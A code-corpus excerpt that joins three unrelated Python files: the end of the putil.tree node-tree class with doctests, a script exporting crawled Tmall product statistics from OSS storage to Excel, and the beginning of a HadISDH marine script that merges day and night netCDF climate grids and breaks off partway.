:param name: Child node name
:type name: :ref:`NodeName`
:rtype: dictionary
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.get_node_parent
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
return (
self._db[self._db[name]['parent']]
if not self.is_root(name) else
{}
)
def get_subtree(self, name):
r"""
Gets all node names in a sub-tree
:param name: Sub-tree root node name
:type name: :ref:`NodeName`
:rtype: list of :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.get_subtree
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
Using the same example tree created in
:py:meth:`putil.tree.Tree.add_nodes`::
>>> from __future__ import print_function
>>> import docs.support.tree_example, pprint
>>> tobj = docs.support.tree_example.create_tree()
>>> print(tobj)
root
├branch1 (*)
│├leaf1
││└subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
└branch2
>>> pprint.pprint(tobj.get_subtree('root.branch1'))
['root.branch1',
'root.branch1.leaf1',
'root.branch1.leaf1.subleaf1',
'root.branch1.leaf2',
'root.branch1.leaf2.subleaf2']
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
return self._get_subtree(name)
def is_root(self, name):
r"""
Tests if a node is the root node (node with no ancestors)
:param name: Node name
:type name: :ref:`NodeName`
:rtype: boolean
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for putil.tree.Tree.is_root
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
return not self._db[name]['parent']
def in_tree(self, name):
r"""
Tests if a node is in the tree
:param name: Node name to search for
:type name: :ref:`NodeName`
:rtype: boolean
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for putil.tree.Tree.in_tree
:raises: RuntimeError (Argument \`name\` is not valid)
.. [[[end]]]
"""
putil.exh.addai('name', self._validate_node_name(name))
return name in self._db
def is_leaf(self, name):
r"""
Tests if a node is a leaf node (node with no children)
:param name: Node name
:type name: :ref:`NodeName`
:rtype: boolean
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for putil.tree.Tree.is_leaf
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
return not self._db[name]['children']
def make_root(self, name):
r"""
Makes a sub-node the root node of the tree. All nodes not belonging to
the sub-tree are deleted
:param name: New root node name
:type name: :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.make_root
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
Using the same example tree created in
:py:meth:`putil.tree.Tree.add_nodes`::
>>> from __future__ import print_function
>>> import docs.support.tree_example
>>> tobj = docs.support.tree_example.create_tree()
>>> print(tobj)
root
├branch1 (*)
│├leaf1
││└subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
└branch2
>>> tobj.make_root('root.branch1')
>>> print(tobj)
root.branch1 (*)
├leaf1
│└subleaf1 (*)
└leaf2 (*)
└subleaf2
"""
putil.exh.addai('name', self._validate_node_name(name))
if (name != self.root_name) and (self._node_in_tree(name)):
for key in [node for node in self.nodes if node.find(name) != 0]:
del self._db[key]
self._db[name]['parent'] = ''
self._root = name
self._root_hierarchy_length = len(
self.root_name.split(self._node_separator)
)
def print_node(self, name):
r"""
Prints node information (parent, children and data)
:param name: Node name
:type name: :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.print_node
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
Using the same example tree created in
:py:meth:`putil.tree.Tree.add_nodes`::
>>> from __future__ import print_function
>>> import docs.support.tree_example
>>> tobj = docs.support.tree_example.create_tree()
>>> print(tobj)
root
├branch1 (*)
│├leaf1
││└subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
└branch2
>>> print(tobj.print_node('root.branch1'))
Name: root.branch1
Parent: root
Children: leaf1, leaf2
Data: [5, 7]
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
node = self._db[name]
children = [
self._split_node_name(child)[-1]
for child in node['children']
] if node['children'] else node['children']
data = (node['data'][0]
if node['data'] and (len(node['data']) == 1) else
node['data'])
return (
'Name: {node_name}\n'
'Parent: {parent_name}\n'
'Children: {children_list}\n'
'Data: {node_data}'.format(
node_name=name,
parent_name=node['parent'] if node['parent'] else None,
children_list=', '.join(children) if children else None,
node_data=data if data else None
)
)
def rename_node(self, name, new_name):
r"""
Renames a tree node. It is typical to have a root node name with more
than one hierarchy level after using
:py:meth:`putil.tree.Tree.make_root`. In this instance the root node
*can* be renamed as long as the new root name has the same or less
hierarchy levels as the existing root name
:param name: Node name to rename
:type name: :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.rename_node
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Argument \`new_name\` has an illegal root node)
* RuntimeError (Argument \`new_name\` is an illegal root node name)
* RuntimeError (Argument \`new_name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
* RuntimeError (Node *[new_name]* already exists)
.. [[[end]]]
Using the same example tree created in
:py:meth:`putil.tree.Tree.add_nodes`::
>>> from __future__ import print_function
>>> import docs.support.tree_example
>>> tobj = docs.support.tree_example.create_tree()
>>> print(tobj)
root
├branch1 (*)
│├leaf1
││└subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
└branch2
>>> tobj.rename_node(
... 'root.branch1.leaf1',
... 'root.branch1.mapleleaf1'
... )
>>> print(tobj)
root
├branch1 (*)
│├leaf2 (*)
││└subleaf2
│└mapleleaf1
│ └subleaf1 (*)
└branch2
"""
name_ex = putil.exh.addai('name')
new_name_ex = putil.exh.addai('new_name')
exists_ex = putil.exh.addex(
RuntimeError, 'Node *[new_name]* already exists'
)
new_name2_ex = putil.exh.addex(
RuntimeError, 'Argument `new_name` has an illegal root node'
)
root_ex = putil.exh.addex(
RuntimeError, 'Argument `new_name` is an illegal root node name'
)
name_ex(self._validate_node_name(name))
new_name_ex(self._validate_node_name(new_name))
self._node_in_tree(name)
exists_ex(
self.in_tree(new_name) and (name != self.root_name),
_F('new_name', new_name)
)
sep = self._node_separator
new_name2_ex(
(name.split(sep)[:-1] != new_name.split(sep)[:-1]) and
(name != self.root_name)
)
old_hierarchy_length = len(name.split(self._node_separator))
new_hierarchy_length = len(new_name.split(self._node_separator))
root_ex(
(name == self.root_name) and
(old_hierarchy_length < new_hierarchy_length)
)
self._rename_node(name, new_name)
def search_tree(self, name):
r"""
Searches tree for all nodes with a specific name
:param name: Node name to search for
:type name: :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.search_tree
:raises: RuntimeError (Argument \`name\` is not valid)
.. [[[end]]]
For example:
>>> from __future__ import print_function
>>> import pprint, putil.tree
>>> tobj = putil.tree.Tree('/')
>>> tobj.add_nodes([
... {'name':'root', 'data':[]},
... {'name':'root/anode', 'data':7},
... {'name':'root/bnode', 'data':[]},
... {'name':'root/cnode', 'data':[]},
... {'name':'root/bnode/anode', 'data':['a', 'b', 'c']},
... {'name':'root/cnode/anode/leaf', 'data':True}
... ])
>>> print(tobj)
root
├anode (*)
├bnode
│└anode (*)
└cnode
└anode
└leaf (*)
>>> pprint.pprint(tobj.search_tree('anode'), width=40)
['root/anode',
'root/bnode/anode',
'root/cnode/anode',
'root/cnode/anode/leaf']
"""
putil.exh.addai('name', self._validate_node_name(name))
return self._search_tree(name)
# Managed attributes
nodes = property(_get_nodes, doc='Tree nodes')
"""
Gets the name of all tree nodes, :code:`None` if the tree is empty
:rtype: list of :ref:`NodeName` or None
"""
node_separator = property(_get_node_separator, doc='Node separator')
"""
Gets the node separator character
:rtype: string
"""
root_name = property(_get_root_name, doc='Tree root node name')
"""
Gets the tree root node name, :code:`None` if the
:py:class:`putil.tree.Tree` object has no nodes
:rtype: :ref:`NodeName` or None
"""
root_node = property(_get_root_node, doc='Tree root node')
"""
Gets the tree root node structure or :code:`None`
if :py:class:`putil.tree.Tree` object has no nodes. See
:py:meth:`putil.tree.Tree.get_node` for details about returned dictionary
:rtype: dictionary or None
"""
|
StarcoderdataPython
|
6680331
|
<gh_stars>1-10
import json
from crawl_taobao_goods_migrate.config import CRAWL_SHOPS
from pyspider.helper.date import Date
from pyspider.helper.excel import Excel
from pyspider.libs.oss import oss
from pyspider.libs.sls import sls
class TmallOss:
"""
天猫商品在oss的数据,输出Excel
"""
def __init__(self, start_time: str, end_time: str):
"""
:param start_time: eg. "2021-03-01"
:param end_time: eg. "2021-04-01"
"""
# 统计时间
self.statistics_start_time = start_time
self.statistics_end_time = end_time
# 保存每个商品的统计数据
self.save_sku = {}
"""
按月份的统计保存数据, eg:
month_save_data = {
"2021-03": {
"monthly_sales_count": 25, # 本期销量
"whole_star": 25, # 当月的总收藏(收藏数都是总数)
},
"2021-04": {
"monthly_sales_count": 25, # 本期销量
"whole_star": 25, # 当月的总收藏(收藏数都是总数)
}
}
"""
self.month_save_data = {}
self.oss_data_start_date = start_time
self.oss_data_end_date = end_time
def entry(self):
for shop_id, shop_url in CRAWL_SHOPS.items():
self.save_sku = {}
self.month_save_data = {}
print("开始导出店铺:{}的商品数据".format(shop_id))
# 多线程跑数据
excel_name = "{shop_id}-{date}".format(shop_id=shop_id, date=Date().now().format(full=False))
begin_date = Date(self.oss_data_start_date)
while True:
path = "crawler/goods/tmall/{shop_id}/{start_date}".format(
shop_id=shop_id, start_date=begin_date.format(full=False).replace("-", "/") + "/")
next_token = ''
excel = self.get_excel()
while True:
files, next_token = oss.list_objects(prefix=path, continuation_token=next_token, max_keys=1000)
print("files count:{}".format(len(files)))
for file in files:
try:
file_name = file.key
print(file_name)
file_obj = oss.get_object(file_name).resp.response.content
data = file_obj
json_data = json.loads(data)
self.value_to_excel(json_data)
except Exception as e:
print("err: {}".format(e.args))
if not next_token:
break
if begin_date.format(full=False) == self.oss_data_end_date:
break
begin_date.plus_days(1)
# 导出数据
for item_key, item_value in self.save_sku.items():
excel.add_data(item_value)
excel.export_file(file_name=excel_name)
print("导出店铺:{}的商品数据完成".format(shop_id))
def sls_entry(self):
"""
获取 aliyun sls 的天猫商品数据
:return:
"""
from_time = Date.now().plus_months(-1).timestamp()
to_time = Date.now().timestamp()
sls.get_log_all("craw-robot", "tmall-goods", from_time, to_time)
def value_to_excel(self, data):
"""
把数据转为erp上传的对应字段
:param data:
:return:
"""
# 商品ID
goods_id = data.get('goods_id', '')
# 保存sku的最新统计数据
save_sku_goods = self.save_sku.get(goods_id, {})
sku_update_time = data.get('update_time', '1970-01-01 08:00:01')
# 商品划线价
price = float(data.get('price', 0))
# 统计时间最高价 - 默认给划线价
period_highest_price = price
# 统计时间最低价 - 默认给划线价
period_lowest_price = price
# 历史最低价 - 默认给划线价
history_lowest_price_in = price
# 上架时间
added_time = save_sku_goods.get("added_time", "")
if save_sku_goods:
# 统计范围内
if Date(self.statistics_start_time).to_day_start().timestamp() <= Date(sku_update_time).to_day_start() \
.timestamp() <= Date(self.statistics_end_time).to_day_start().timestamp():
# 统计时间最高价
if price > save_sku_goods.get("period_highest_price", 0):
period_highest_price = price
# 统计时间最低价
if price < save_sku_goods.get("period_lowest_price", 0):
period_lowest_price = price
# 历史最低价
if price < save_sku_goods.get("history_lowest_price_in", 0):
history_lowest_price_in = price
else:
if price < save_sku_goods.get("history_lowest_price_in", 0):
history_lowest_price_in = price
else:
added_time = data.get('update_time', '')
# 本期销量
monthly_sales_count = data.get('sales_count_monthly', 0)
if isinstance(monthly_sales_count, str):
if "100+" in monthly_sales_count:
monthly_sales = 100 * period_highest_price
monthly_sales_count = 100
elif "200+" in monthly_sales_count:
monthly_sales = 200 * period_highest_price
monthly_sales_count = 200
elif "400+" in monthly_sales_count:
monthly_sales = 400 * period_highest_price
monthly_sales_count = 400
else:
monthly_sales = int(monthly_sales_count) * period_highest_price
else:
monthly_sales = int(monthly_sales_count) * period_highest_price
# 总收藏
whole_star = data.get('star_number', 0)
# 按月份的统计的数据
month_date_str = Date(data.get('update_time', '')).format(full=False)[:-3]
self.month_save_data[month_date_str] = {
"monthly_sales_count": monthly_sales_count, # 本期销量
"whole_star": whole_star, # 当月的总收藏(收藏数都是总数)
}
# 总销量
total_sales_count = sum(
[int(data_item.get("monthly_sales_count", 0)) for date_str, data_item in self.month_save_data.items()])
# 本期收藏
now_date_str = Date().now().format(full=False)[:-3]
last_month_date_str = Date().now().plus_months(-1).format(full=False)[:-3]
monthly_star = self.month_save_data.get(now_date_str, {}).get("whole_star", 0) - self.month_save_data.get(
last_month_date_str, {}).get("whole_star", 0)
color = ""
for item_sku in data.get("sku", {}):
if item_sku.get("stock", 0) > 0:
color = item_sku.get("color", "")
barcode = ""
year_season = ""
material = ""
sales_channel_type = ""
suitable_age = ""
my_brand = ""
goods_attr_list = data.get("goods_attr_list", [])
for goods in goods_attr_list:
item_str = goods
if "货号" in item_str:
barcode = item_str.split(':', 1)[1].strip()
elif "年份季节" in item_str:
year_season = item_str.split(':', 1)[1].strip()
elif "材质成分" in item_str:
material = item_str.split(':', 1)[1].strip()
elif "销售渠道类型" in item_str:
sales_channel_type = item_str.split(':', 1)[1].strip()
elif "适用年龄" in item_str:
suitable_age = item_str.split(':', 1)[1].strip()
elif "品牌" in item_str:
my_brand = item_str.split(':', 1)[1].strip()
the_list = {
'goods_id': goods_id,
'title': data.get('goods_name', ''),
'main_image': data.get('main_img', ''),
'origin_price': data.get('original_price', 0),
'price': price,
'period_highest_price': period_highest_price,
'period_lowest_price': period_lowest_price,
'history_lowest_price_in': history_lowest_price_in,
'category': data.get('category', ''),
'goods_url': data.get('goods_url', ''),
'added_time': added_time,
'industry': data.get('industry', ''),
'shop_name': data.get('shop_name', ''),
'statistics_time': "{} - {}".format(self.statistics_start_time, self.statistics_end_time),
'total_sales_count': total_sales_count,
'monthly_sales_count': monthly_sales_count,
'monthly_sales': monthly_sales,
'monthly_star': monthly_star,
'whole_star': whole_star,
'whole_comments_count': data.get('comments_count', ''),
'stock': data.get('stock', ''),
'color': color,
'barcode': barcode,
'brand': my_brand,
'year_season': year_season,
'material': material,
'sales_channel_type': sales_channel_type,
'suitable_age': suitable_age,
'update_time': data.get('update_time', ''),
}
self.save_sku[goods_id] = the_list
def get_excel(self):
"""
定义表头及字段名
:return:
"""
return Excel() \
.add_header('goods_id', '商品ID') \
.add_header('title', '商品标题') \
.add_header('main_image', '商品主图链接') \
.add_header('origin_price', '商品价格') \
.add_header('price', '商品划线价') \
.add_header('period_highest_price', '统计时间最高价') \
.add_header('period_lowest_price', '统计时间最低价') \
.add_header('history_lowest_price_in', '历史最低价') \
.add_header('category', '商品类目') \
.add_header('goods_url', '商品链接') \
.add_header('added_time', '上架时间') \
.add_header('industry', '所属行业') \
.add_header('shop_name', '所属店铺') \
.add_header('statistics_time', '统计时间') \
.add_header('total_sales_count', '总销量') \
.add_header('monthly_sales_count', '本期销量') \
.add_header('monthly_sales', '本期销售额(元)') \
.add_header('monthly_star', '本期收藏') \
.add_header('whole_star', '总收藏') \
.add_header('whole_comments_count', '总评价') \
.add_header('stock', '库存') \
.add_header('color', '颜色') \
.add_header('barcode', '货号') \
.add_header('brand', '品牌') \
.add_header('year_season', '年份季节') \
.add_header('material', '材质成分') \
.add_header('sales_channel_type', '销售渠道类型') \
.add_header('suitable_age', '适用年龄') \
.add_header('update_time', '数据更新时间')
if __name__ == '__main__':
TmallOss("2021-04-01", "2021-04-01").entry()
|
StarcoderdataPython
|
11290850
|
#!/usr/local/sci/bin/python2.7
#*****************************
#
# merge _day and _night netCDF files
#
#
#************************************************************************
'''
Author: <NAME>
Created: March 2016
Last update: 12 April 2016
Location: /project/hadobs2/hadisdh/marine/PROGS/Build
-----------------------
CODE PURPOSE AND OUTPUT
-----------------------
Merge outputs from _day and _night to create _both. An alternative approach to the _all files
For uncertainty this assumes correlation of r=1 for SLR, SCN, HGT and C and no correlation (r=0) for R, M and TOT
-----------------------
LIST OF MODULES
-----------------------
utils.py
-----------------------
DATA
-----------------------
Input data stored in:
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2noQC/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSERAclimNBC/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim1NBC/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2NBC/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2BCtotal/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2BChgt/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2BCinstr/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2BCtotalship/
-----------------------
HOW TO RUN THE CODE
-----------------------
python2.7 merge_day_night.py --suffix relax --clims --months --start_year YYYY --end_year YYYY --start_month MM --end_month MM (OPTIONAL: one of --doQC1it, --doQC2it, --doQC3it, --doBCtotal, --doBCinstr, --doBChgt, --doNOWHOLE,+ --ShipOnly)
Run for uncertainty (with BCtotal and ShipOnly)
python2.7 merge_day_night.py --suffix relax --months --start_year YYYY --end_year YYYY --start_month MM --end_month MM --doBCtotal --doUSCN --ShipOnly
(--doUHGT, --doUR, --doUC, --doUM, --doUTOT, --doUSLR)
python2.7 gridding_cam.py --help
will show all options
--clims - run for the climatologies
--months - run for the monthly files (will need years and months)
-----------------------
OUTPUT
-----------------------
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2noQC/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSERAclimNBC/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim1NBC/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2NBC/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2BCtotal/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2BChgt/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2BCinstr/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2BCtotalship/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2BCtotalshipNOWHOLE/
-----------------------
VERSION/RELEASE NOTES
-----------------------
Version 4 (11 May 2020) <NAME>
---------
Enhancements
This now works with --doNOWHOLE which runs a BCtotal version with all of the rounding flagged data removed (run with --ShipOnly
Changes
Bug fixes
Version 3 (9 Oct 2018) <NAME>
---------
Enhancements
This now works with the uncertainty fields which are only present for --doBCtotal --ShipOnly
Changes
Bug fixes
Version 2 (26 Sep 2016) <NAME>
---------
Enhancements
This can now work with the iterative approach which requires doQCit1, doQCit2 and doQCit3 to set the correct filepaths
It can also work with bias corrected grids which requires --doBCtotal, --doBChgt or --doBCscn
It can also work with --ShipOnly
Look for:
# KATE modified
...
# end
Changes
This hard wires the MEAN in places where I think that is sensible, despite settings.doMedian being set to True.
Look for # KATE MEDIAN WATCH
ACTUALLY - A TEST OF np.mean AND np.median ON A 2-ELEMENT ARRAY GIVES THE SAME ANSWER!!!!
Bug fixes
set_up_merge had issues with start_year = START_YEAR. I commented out the four time elements as these are all defined in the call
to function and do not need to be redefined here
The output latitudes were one box too high (92.5 to -82.5) so I switched the + for a - to solve this
Version 1 (release date)
---------
Enhancements
Changes
Bug fixes
-----------------------
OTHER INFORMATION
-----------------------
'''
import os
import datetime as dt
import numpy as np
import sys
import argparse
import matplotlib
matplotlib.use('Agg')
import calendar
import netCDF4 as ncdf
import pdb
import utils
import set_paths_and_vars
defaults = set_paths_and_vars.set()
#************************************************************************
def do_merge(fileroot, mdi, suffix = "relax", clims = False, doMedian = False, TimeFreq = 'M',
# UNC NEW
doUSLR = False, doUSCN = False, doUHGT = False, doUR = False, doUM = False, doUC = False, doUTOT = False):
'''
Merge the _day and _night files
Do a np.ma.mean or median for the data and a sum for the n_obs and n_grids
Output with a _both suffix
:param str fileroot: root for filenames
:param flt mdi: missing data indicator
:param str suffix: "relax" or "strict" criteria
:param bool clims: if climatologies then don't try and process anomalies.
:param bool doMedian: switch to enforce use of median over means
:param str TimeFreq: note to say which time resolution we're working with to write out - default M = monthly
# UNC NEW
:param bool doUSLR: do solar adjustment uncertainties
:param bool doUSCN: do instrument adjustment uncertainties
:param bool doUHGT: do height adjustment uncertainties
:param bool doUR: do rounding uncertainties
:param bool doUM: do measurement uncertainties
:param bool doUC: do climatology uncertainties
:param bool doUTOT: do total uncertainties
'''
# UNC NEW
# If there is an uncertainty run set then set uSource to the name of hte uncertainty
if doUSLR:
uSource = 'uSLR'
elif doUSCN:
uSource = 'uSCN'
elif doUHGT:
uSource = 'uHGT'
elif doUR:
uSource = 'uR'
elif doUM:
uSource = 'uM'
elif doUC:
uSource = 'uC'
elif doUTOT:
uSource = 'uTOT'
OBS_ORDER = utils.make_MetVars(mdi, multiplier = False)
if clims:
# KW make OBS_ORDER only the actual variables - remove anomalies
NEWOBS_ORDER = []
for v, var in enumerate(OBS_ORDER):
if "anomalies" not in var.name:
NEWOBS_ORDER.append(var)
del OBS_ORDER
OBS_ORDER = np.copy(NEWOBS_ORDER)
del NEWOBS_ORDER
# spin through both periods
for p, period in enumerate(["day", "night"]):
print period
# go through the variables
for v, var in enumerate(OBS_ORDER):
print " {}".format(var.name)
ncdf_file = ncdf.Dataset("{}_{}_{}.nc".format(fileroot, period, suffix),'r', format='NETCDF4')
if v == 0 and p == 0:
if doUSLR | doUSCN | doUHGT | doUR | doUM | doUC | doUTOT:
shape = list(ncdf_file.variables[var.name+"_"+uSource][:].shape)
else:
shape = list(ncdf_file.variables[var.name][:].shape)
shape.insert(0, len(OBS_ORDER)+2) # add all the variables
shape.insert(0, 2) # insert extra dimension to allow day + night
all_data = np.ma.zeros(shape)
if doUSLR | doUSCN | doUHGT | doUR | doUM | doUC | doUTOT:
all_data[p, v] = ncdf_file.variables[var.name+"_"+uSource][:]
else:
all_data[p, v] = ncdf_file.variables[var.name][:]
# get lats/lons of box centres
lat_centres = ncdf_file.variables["latitude"]
# KATE modified - this results in lats that go from 92.5 to -82,5 so I've switched the + for a -
latitudes = lat_centres - (lat_centres[1] - lat_centres[0])/2.
#latitudes = lat_centres + (lat_centres[1] - lat_centres[0])/2.
# end
lon_centres = ncdf_file.variables["longitude"]
longitudes = lon_centres + (lon_centres[1] - lon_centres[0])/2.
# get times - make a dummy object and then populate attributes
times = utils.TimeVar("time", "time since 1/{}/{} in hours".format(1, 1973), "hours", "time")
times.long_name = ncdf_file.variables["time"].long_name
times.standard_name = ncdf_file.variables["time"].standard_name
times.long_name = ncdf_file.variables["time"].long_name
times.units = ncdf_file.variables["time"].units
times.data = ncdf_file.variables["time"][:]
else:
if doUSLR | doUSCN | doUHGT | doUR | doUM | doUC | doUTOT:
all_data[p, v] = ncdf_file.variables[var.name+"_"+uSource][:]
else:
all_data[p, v] = ncdf_file.variables[var.name][:]
# and get n_obs and n_grids
all_data[p, -2] = ncdf_file.variables["n_grids"][:]
all_data[p, -1] = ncdf_file.variables["n_obs"][:]
# invert latitudes
latitudes = latitudes[::-1]
all_data = all_data[:,:,:,::-1,:]
# got all the info, now merge
# If this is an uncertainty field then combine in quadrature with or without correlations
if doMedian: # THIS IS A BIG PILE OF RUBBISH FOR UNCERTAINTY SO DON'T DO IT
# UNC NEW
# Assumed correlating at r=1
if doUSLR | doUSCN | doUHGT | doUC:
merged_data = utils.bn_median(all_data[:, :len(OBS_ORDER)], axis = 0) / np.sqrt(np.ma.count(all_data[:, :len(OBS_ORDER)], axis = 0))
# Assumed no correlation r=0
elif doUR | doUM | doUTOT:
merged_data = utils.bn_median(all_data[:, :len(OBS_ORDER)], axis = 0) / np.sqrt(np.ma.count(all_data[:, :len(OBS_ORDER)], axis = 0))
else:
merged_data = utils.bn_median(all_data[:, :len(OBS_ORDER)], axis = 0)
else:
# Assumed correlating at r=1
if doUSLR | doUSCN | doUHGT | doUC:
# <NAME> thinks that this should be /N rather than /SQRT(N) which will make uncertainties smaller so I'm trying it
# merged_data = np.sqrt(np.ma.power(np.ma.sum(all_data[:, :len(OBS_ORDER)], axis = 0),2.)) / np.sqrt(np.ma.count(all_data[:, :len(OBS_ORDER)], axis = 0))
merged_data = np.sqrt(np.ma.power(np.ma.sum(all_data[:, :len(OBS_ORDER)], axis = 0),2.)) / np.ma.count(all_data[:, :len(OBS_ORDER)], axis = 0)
# print('Doing correlated mean combo:',merged_data)
# pdb.set_trace()
# Assumed no correlation r=0
elif doUR | doUM | doUTOT:
# <NAME> thinks that this should be /N rather than /SQRT(N) which will make uncertainties smaller so I'm trying it
# merged_data = np.sqrt(np.ma.sum(np.ma.power(all_data[:, :len(OBS_ORDER)],2.), axis = 0)) / np.sqrt(np.ma.count(all_data[:, :len(OBS_ORDER)], axis = 0))
merged_data = np.sqrt(np.ma.sum(np.ma.power(all_data[:, :len(OBS_ORDER)],2.), axis = 0)) / np.ma.count(all_data[:, :len(OBS_ORDER)], axis = 0)
# print('Doing uncorrelated mean combo:',merged_data)
# pdb.set_trace()
else:
merged_data = np.ma.mean(all_data[:, :len(OBS_ORDER)], axis = 0)
# print('Doing flat mean combo:',merged_data)
# pdb.set_trace()
# and process the grids and observations (split off here so have incorporated latitude inversion)
n_grids = np.ma.sum(all_data[:, -2], axis = 0)
n_obs = np.ma.sum(all_data[:, -1], axis = 0)
n_obs.fill_value = -1
n_grids.fill_value = -1
# write the output file
# UNC NEW
if doUSLR | doUSCN | doUHGT | doUR | doUM | doUC | doUTOT:
utils.netcdf_write_unc(uSource, "{}_{}_{}.nc".format(fileroot, "both", suffix), merged_data, n_grids, n_obs, OBS_ORDER, latitudes, longitudes, times, frequency = TimeFreq, \
doUSLR = doUSLR, doUSCN = doUSCN, doUHGT = doUHGT, doUR = doUR, doUM = doUM, doUC = doUC, doUTOT = doUTOT)
else:
utils.netcdf_write("{}_{}_{}.nc".format(fileroot, "both", suffix), merged_data, n_grids, n_obs, OBS_ORDER, latitudes, longitudes, times, frequency = TimeFreq)
# test distribution of obs with grid boxes
outfile = file("{}_{}_{}.txt".format(fileroot.split("/")[-1], "both", suffix), "w")
utils.boxes_with_n_obs(outfile, n_obs, merged_data[0], "")
return # do_merge
#************************************************************************
def get_fileroot(settings, climatology = False, pentads = False, months = [], do3hr = True, time = [], daily = True, stdev = False,
# UNC NEW
doUSLR = False, doUSCN = False, doUHGT = False, doUR = False, doUM = False, doUC = False, doUTOT = False):
'''
Get the filename root depending on switches
:param Settings settings: settings object for paths
:param bool climatology: for pentad climatology files
:param bool pentads: for annual pentad files
:param bool months: for monthly files
:param bool do3hr: run for pentad climatology files created from 3hrly data
:param list monthly: pass in [YYYY] or [YYYY, MM] for pentad or monthly files
:param bool daily: run for monthly grids created from 1x1 daily
:param bool stdev: run on the standard deviation files from climatology
# UNC NEW
:param bool doUSLR: run for solar uncertainties
:param bool doUSCN run for instrument uncertainties
:param bool doUHGt: run for height uncertainties
:param bool doUR: run for rounding uncertainties
:param bool doUM: run for measurement uncertainties
:param bool doUC: run for climatology uncertainties
:param bool doUTOT: run for total uncertainties
'''
# UNC NEW
# If there is an uncertainty run set then set uSource to the name of hte uncertainty
if doUSLR:
uSource = 'uSLR'
elif doUSCN:
uSource = 'uSCN'
elif doUHGT:
uSource = 'uHGT'
elif doUR:
uSource = 'uR'
elif doUM:
uSource = 'uM'
elif doUC:
uSource = 'uC'
elif doUTOT:
uSource = 'uTOT'
if climatology and months != []:
print "Cannot run both for Climatology files and for Monthly files"
raise RuntimeError
if climatology:
if do3hr:
if stdev:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_1x1_pentad_stdev_from_3hrly"
else:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_1x1_pentad_climatology_from_3hrly"
else:
if stdev:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_1x1_pentad_stdev"
else:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_1x1_pentad_climatology"
elif pentads:
if do3hr:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_1x1_pentad_from_3hrly_{}".format(time[0])
else:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_1x1_pentad_{}".format(time[0])
elif months != []:
# UNC NEW
if doUSLR | doUSCN | doUHGT | doUR | doUM | doUC | doUTOT:
if daily:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_{}_5x5_monthly_from_daily_{}{:02d}".format(uSource, time[0], time[1])
else:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_{}_5x5_monthly_{}{:02d}".format(uSource, time[0], time[1])
else:
if daily:
